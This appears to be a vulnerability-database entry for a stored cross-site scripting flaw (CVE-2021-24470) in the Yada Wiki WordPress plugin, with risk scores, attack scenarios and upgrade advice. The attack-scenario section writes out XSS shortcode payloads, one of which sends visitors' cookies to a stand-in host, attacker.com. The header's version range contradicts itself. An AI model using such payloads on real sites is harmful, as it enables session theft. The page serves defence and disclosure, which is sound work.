Sploit.io - Search

Product: Yada Wiki, version: >= 3.4.1, < 3.4.1

CVE-2021-24470

Severity: Unknown

Description: The Yada Wiki WordPress plugin before 3.4.1 did not sanitise, validate or escape the anchor attribute of its shortcode, leading to a Stored Cross-Site Scripting issue

CVSS Score: N/A

Priority

D

CISA Data

EPSS Data

  • EPSS: 0.001800000
  • Percentile: 0.393720000
  • Date: 2026-03-19

ExploitDB

No data available.

HackerOne Data

  • Rank: 8932
  • Reports submitted count: 0
  • Unknown: 0
  • None: 0
  • Low: 0
  • Medium: 0
  • High: 0
  • Critical: 0

GitHub PoCs

    Nuclei Templates

    No data available.

    VulnCheck Data

    Affected Products:

    • Unknown Yada Wiki - Versions: 3.4.1

    References:

    Risk Assessment

    1. Risk Assessment
    The Yada Wiki WordPress plugin before version 3.4.1 is susceptible to a Stored Cross-Site Scripting (XSS) vulnerability. This means an attacker can inject malicious JavaScript code into the wiki content which will be executed in the browsers of users who view that content. The nature of the vulnerability stems from a lack of proper sanitization, validation, or escaping of the 'anchor' attribute within the plugin’s shortcode. The business impact ranges from defacement of the wiki to potential theft of user cookies or redirection to malicious websites. The likelihood of exploitation is moderate, as it requires the attacker to have the ability to contribute content to the wiki, but the ease of exploitation is relatively high once contributor access is gained. The primary impact is on confidentiality (potentially stealing cookies/session tokens), and integrity (altering wiki content or redirecting users). Availability could be impacted if the injected script causes significant browser resource consumption or redirects users away from the wiki. The EPSS score of 0.001800000 suggests a relatively low, but not negligible, level of risk.

    2. Potential Attack Scenarios
    An attacker with contributor or higher privileges on a Yada Wiki powered WordPress site can inject malicious JavaScript code into a wiki page using the anchor attribute of a shortcode. For example, an attacker could insert the following shortcode: [yada anchor='<script>alert("XSS");</script>'] into a wiki page. When a user views that page, the injected JavaScript code will execute, displaying an alert box. A more sophisticated attack could involve stealing cookies by injecting a script that sends the cookies to an attacker-controlled server: [yada anchor='<script>document.location="http://attacker.com/steal.php?cookie="+document.cookie;</script>']. This allows the attacker to potentially hijack the user’s session. Another scenario involves redirecting users to a phishing page disguised as the wiki, tricking them into entering their credentials.

    3. Mitigation Recommendations
    The primary mitigation is to upgrade the Yada Wiki plugin to version 3.4.1 or higher. This version includes the necessary sanitization, validation, and escaping to prevent the Stored XSS vulnerability. The upgrade can be performed through the WordPress admin dashboard by navigating to Plugins > Installed Plugins and checking for updates. After upgrading, it is recommended to review existing wiki pages for potentially malicious content injected before the patch was applied. Users should also practice least privilege, granting only necessary access levels to contributors. For further information, refer to the vulnerability report on WPScan: https://wpscan.com/vulnerability/b01a85cc-0e45-4183-a916-19476354d5d4

    4. Executive Summary
    The Yada Wiki WordPress plugin is vulnerable to a Stored Cross-Site Scripting (XSS) attack, allowing attackers to inject malicious code into wiki pages viewed by other users. This could lead to user sessions being hijacked, wiki content being altered, or users being redirected to malicious websites. While the risk is moderate, the potential impact on users and the organization’s reputation warrants prompt action. We recommend upgrading the Yada Wiki plugin to version 3.4.1 or higher immediately. This is a relatively simple fix that will significantly reduce the risk of a successful XSS attack. Failing to address this vulnerability could result in compromised user accounts and a loss of trust in the Yada Wiki as a reliable information source. Prioritize this update as part of your ongoing WordPress security maintenance.